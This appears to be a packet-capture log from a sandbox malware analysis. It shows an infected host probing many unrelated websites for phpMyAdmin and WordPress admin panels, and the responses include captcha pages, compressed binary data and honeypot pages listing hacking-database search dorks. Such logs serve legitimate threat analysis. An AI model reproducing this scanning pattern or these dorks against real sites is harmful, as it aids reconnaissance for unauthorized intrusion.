Feb 21, 2024 00:26:10.033749104 CET	1286	IN	Data Raw: 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 20 3d 20 22 41 42 43 44 45 46 47 48 49 Data Ascii: tring() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.
Feb 21, 2024 00:26:10.033762932 CET	476	IN	Data Raw: 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 Data Ascii: "center" valign="middle"> <div> <noscript> <h1 style="color:#990000;">Please, turn Javascript on in your browser then reload the page.</h1> </noscript>
Feb 21, 2024 00:26:10.033813000 CET	1286	IN	Data Raw: 22 73 6b 2d 63 69 72 63 6c 65 32 20 73 6b 2d 63 68 69 6c 64 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 69 72 63 6c 65 Data Ascii: "sk-circle2 sk-child"></div> <div class="sk-circle3 sk-child"></div> <div class="sk-circle4 sk-child"></div> <div class="sk-circle5 sk-child"></div
Feb 21, 2024 00:26:10.033843040 CET	1286	IN	Data Raw: 3d 22 6f 72 69 67 69 6e 5f 75 72 6c 22 20 76 61 6c 75 65 3d 22 2f 77 70 2d 61 64 6d 69 6e 2f 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ="origin_url" value="/wp-admin/"/> </form> </div> <div class="link"> <a href="https://bitninja.io" target="_blank" style="font-size: 12px;">Security chec
Feb 21, 2024 00:26:10.033911943 CET	1286	IN	Data Raw: 76 65 6e 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 6a 65 76 65 6e 74 73 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 Data Ascii: vents'>This contact form is about /components/com_jevents/ </a><br><a href='index.php?option=com_contact'>This contact form is about /components/com_contact/ </a><br><a href='index.php?option=com_search'>This contact form is about /component
Feb 21, 2024 00:26:10.222328901 CET	1286	IN	Data Raw: 2e 70 68 70 3f 70 61 72 61 6d 3d 68 6f 6e 65 79 22 3e 47 48 44 42 20 53 69 67 6e 61 74 75 72 65 20 23 37 33 33 20 28 26 71 75 6f 74 3b 45 6e 74 65 72 20 69 70 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 26 71 75 6f 74 3b 70 68 70 2d 70 69 6e 67 2e 70 Data Ascii: .php?param=honey">GHDB Signature #733 ("Enter ip" inurl:"php-ping.php")</a><br><br><a href="demo/GHH%20-%20PHP%20Shell/phpshell.php?param=honey">GHDB Signature #365 (intitle:"PHP Shell *" "Enable stderr&quo

Session ID	Source IP	Source Port	Destination IP	Destination Port
165	192.168.2.6	57299	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.864269018 CET	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.322662115 CET	1286	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df b7 6e cb da d0 b1 88 ce 82 38 2d f4 03 60 67 Data Ascii: 253a}ru\ufv#iGDI'[N3qr6{6I(S,;VyIL99_mmmR%@7Fw8<~ooN88+:9;hhfA{h0k5o45&aq&T\|ngFSp-[~%/\k;S5(83vK}b>w:560Fv4nn4gjQ]~c1j1O.CvrqF\|8seO6LsJ7g]n3>-F5Aix8`DN.\|]a+5f ]ida\,jyT(1'/,'kvS[5?~=g>{Qe7oBfzQ NT#EO%q90c/Z[B~5{bx\|&5a~4nvjZUHT7_C=f~k/ PdCm>m'Cp)c4v_Z>\9ZU^rmUu,s`-U#>#-u>yVW0C,_nP\eU2R8U@Y#=U?$mgPC/#n8-`g
Feb 21, 2024 00:26:10.322678089 CET	1286	IN	Data Raw: 53 d2 b8 41 e7 0b 07 75 6e a1 dd dd 51 7b b3 5e 4d be 9d dc f4 f9 34 7c 8e 9a 78 fe b5 ea 76 ea fb ee 81 6d 38 dc 1d 85 e3 7d f7 a7 9f 2a 49 2b ef ed f7 ee c7 8f 9d a8 ef 71 cf ab 56 a7 1b fa 68 da 18 fa de e4 19 66 81 67 de 80 ef db c3 f2 a6 f3 Data Ascii: SAunQ{^M4\|xvm8}I+qVhfgu\34Tv>?\!'s{41)"16m^gPZCGIIUjnmWw}6]\|[ehpfvMUoUwN}o[A
Feb 21, 2024 00:26:10.322695017 CET	1286	IN	Data Raw: 98 8e d0 13 e4 f4 24 0b d2 f2 73 db 61 82 4f be a7 95 05 d6 8b 4c b7 84 1e 07 9b ba fe de 1e 32 27 64 a7 27 6c ef 23 ac 3a 35 7d d3 3c 9d f6 56 3f d0 52 c3 0c 6e f3 1a 39 d1 b7 82 b1 7d 0d 0f a9 0d df 1c 3e a9 c9 54 cb 99 c3 7f 28 68 78 37 e0 02 Data Ascii: $saOL2'd'l#:5}<V?Rn9}>T(hx7>N_bfYf==#F2,z6qen%z7%\Gaa9a(8m-0Cc,no76mOE1Mm[.
Feb 21, 2024 00:26:10.322710991 CET	1286	IN	Data Raw: 0d a6 e6 45 f9 1a 7d 19 37 b3 05 a4 1c 68 87 dd b7 cf 7e 39 01 0f 37 0f 0f c4 d2 0f 99 68 63 0f ae 54 40 8d 9b 94 8d 88 d7 b1 01 09 42 8a 55 df 6a ff 01 79 26 1f 11 13 d2 df 47 07 c2 2a 4d c5 e1 16 20 68 4c ba 87 91 7e e7 b9 3d 67 e6 77 34 24 41 Data Ascii: E}7h~97hcT@BUjy&GM hL~=gw4$A#STSUR_Kwg1shSf# wKb[lPDF+RDAOSSS<9-RGYX}*GBvAhDg+-H1Ar8"A8YlKM/5NC
Feb 21, 2024 00:26:10.322729111 CET	1286	IN	Data Raw: 4d 17 fb f7 8e 68 11 aa 3d d4 7d 77 27 7e 7a b3 5e bf c1 4f ca 99 a7 91 b3 0b fb 20 35 13 a6 29 9c 09 e4 cd 55 5f 6a 18 57 e5 c4 03 bd 9e 13 8b c2 dd 00 99 40 2f e0 82 78 c5 67 28 0e 8d 7d 8f c3 ce 58 d8 9f 28 7b 28 4d 0a f8 31 68 87 62 4f ec 50 Data Ascii: Mh=}w'~z^O 5)U_jW@/xg(}X({(M1hbOPp.<B>`_M\|~O0RQ,oEVo@8VOUluNB@,=z'GujE,~ yR2%F.G8Ij~DF>qR
Feb 21, 2024 00:26:10.322789907 CET	1286	IN	Data Raw: 79 99 99 b5 e1 b3 a0 99 5b 78 e6 1f 15 1a 4e 25 d8 14 0e 42 e8 71 a4 f7 b8 8d 10 87 f2 23 51 4c 4a 1e bd d5 55 ef b1 c7 c9 4e fc 4c 44 73 f2 7c 12 54 39 93 8b 8f 6b 21 30 e0 b3 10 ab 7e f8 48 06 3a 1c cf 70 d3 8e c2 74 e2 c0 71 f2 9e 4d 66 f0 05 Data Ascii: y[xN%Bq#QLJUNLDs\|T9k!0~H:ptqMfg.\#Kr&\|r(M#r.:]I >+l0-"/&<d-vZM#YG5FC#J8LNL_EN}lfp1"$#!/GB{dNdafHHv82
Feb 21, 2024 00:26:10.322824955 CET	1286	IN	Data Raw: 45 2d 72 43 2d 73 be b9 93 a7 e3 cc 64 ae 28 42 af d8 cf b5 1e 5e 9f 70 42 93 8b b0 5b 18 e6 90 cc 6c e5 0e 64 32 51 14 41 ec 57 09 81 5d 88 cd 54 c5 99 ff 13 02 9d 2e 24 3a 80 a3 2c 0f 37 33 4f a1 99 c9 cc b0 72 38 a5 a1 f6 6b 0a c4 7a 64 73 a0 Data Ascii: E-rC-sd(B^pB[ld2QAW]T.$:,73Or8kzdslk@Gf2^FrQ]ona[9rzoHe#*3q3E'D2@rczE!_j0+(\|`lY-9cLHTkD
Feb 21, 2024 00:26:10.322856903 CET	951	IN	Data Raw: c9 6c 5c cf 29 ce ef 4d d7 65 0c 57 65 94 05 f0 f7 f6 47 dc 25 89 6c be 57 e8 89 41 87 07 dc bc 1e 96 4b 83 e0 77 91 d9 6d 0f 4a 15 b6 d9 61 ba c9 9e 3c 91 4d 53 8d 29 4e ff 72 c3 57 c0 de 80 e1 4f 55 59 07 54 38 42 61 3a 2b 78 f9 5f 0c 2b 55 13 Data Ascii: l\)MeWeG%lWAKwmJa<MS)NrWOUYT8Ba:+x_+Uf!s@yH-$HrC{,e7WEh4QN:!%xvX.=,\^yJ}5S9o\>9LTQwa(aX[EI1K\|VpCxqI-^

Session ID	Source IP	Source Port	Destination IP	Destination Port
166	192.168.2.6	57285	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.867886066 CET	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.064973116 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Length: 13695 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-ali
Feb 21, 2024 00:26:10.064994097 CET	1286	IN	Data Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a Data Ascii: gn: center;} .link {margin-top: 40px;} .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;}
Feb 21, 2024 00:26:10.065099001 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 38 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 Data Ascii: } .sk-circle .sk-circle8 {-webkit-transform: rotate(210deg);-ms-transform: rotate(210deg);transform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform:
Feb 21, 2024 00:26:10.065119028 CET	1286	IN	Data Raw: 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c Data Ascii: re {-webkit-animation-delay: -0.5s;animation-delay: -0.5s; } .sk-circle .sk-circle9:before {-webkit-animation-delay: -0.4s;animation-delay: -0.4s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animati
Feb 21, 2024 00:26:10.065171003 CET	1286	IN	Data Raw: 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 62 72 6f 77 73 65 72 49 6e 74 65 67 72 69 74 79 43 68 65 63 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: }, 1000); } function browserIntegrityCheck() { w = window.innerWidth; h = window.innerHeight; arr = [w, h, Math.floor((Math.random() * 9) + 1)]; arr.pus
Feb 21, 2024 00:26:10.065184116 CET	1286	IN	Data Raw: 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 20 3d 20 22 41 42 43 44 45 46 47 48 49 Data Ascii: tring() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.
Feb 21, 2024 00:26:10.065243006 CET	1286	IN	Data Raw: 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 Data Ascii: "center" valign="middle"> <div> <noscript> <h1 style="color:#990000;">Please, turn Javascript on in your browser then reload the page.</h1> </noscript>
Feb 21, 2024 00:26:10.065259933 CET	1286	IN	Data Raw: 20 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 69 6e 67 20 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 20 73 65 63 75 72 65 6c 79 e2 80 a6 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 Data Ascii: <h1>Accessing /phpMyAdmin/ securely</h1> <span>This is an automatic process. Your browser will redirect to your requested content in <span id="seconds">5</span> seconds.</span> </di
Feb 21, 2024 00:26:10.065275908 CET	1286	IN	Data Raw: 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 61 63 61 6a 6f 6f 6d 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 63 6f 6e 74 65 6e 74 27 3e 54 68 69 73 20 63 6f Data Ascii: t /components/com_acajoom/ </a><br><a href='index.php?option=com_content'>This contact form is about /components/com_content/ </a><br><a href='index.php?option=com_phocagallery'>This contact form is about /components/com_phocagallery/ </a><b
Feb 21, 2024 00:26:10.065319061 CET	1286	IN	Data Raw: 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 46 43 4b 65 64 69 74 6f 72 20 2d 20 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 Data Ascii: Uploaders Tests'>This contact form is about /components/FCKeditor - Uploaders Tests/ </a><br><a href='index.php?option=phpmyadmin'>This contact form is about /components/phpmyadmin/ </a><br><a href='index.php?option=phpmyadmin2'>This contact
Feb 21, 2024 00:26:10.065352917 CET	1080	IN	Data Raw: 72 72 65 6c 4d 61 69 6c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 34 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 73 72 63 20 65 78 74 3a 70 68 70 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 64 65 6d 6f 2f 3f 47 48 48 20 76 Data Ascii: rrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - WebUtil 2.7">GHDB Signature #1013 ("SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - .mdb/admin.mdb">GHDB S

Session ID	Source IP	Source Port	Destination IP	Destination Port
167	192.168.2.6	57337	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.870939016 CET	216	OUT	GET /wp-admin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://hotmail.fr.au/wp-login.php
Feb 21, 2024 00:26:10.045660019 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:09 GMT server: Apache set-cookie: __tad=1708471569.2319092; expires=Fri, 17-Feb-2034 23:26:09 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
168	192.168.2.6	57338	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.871469975 CET	216	OUT	GET /wp-admin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://hotmail.fr.au/wp-login.php
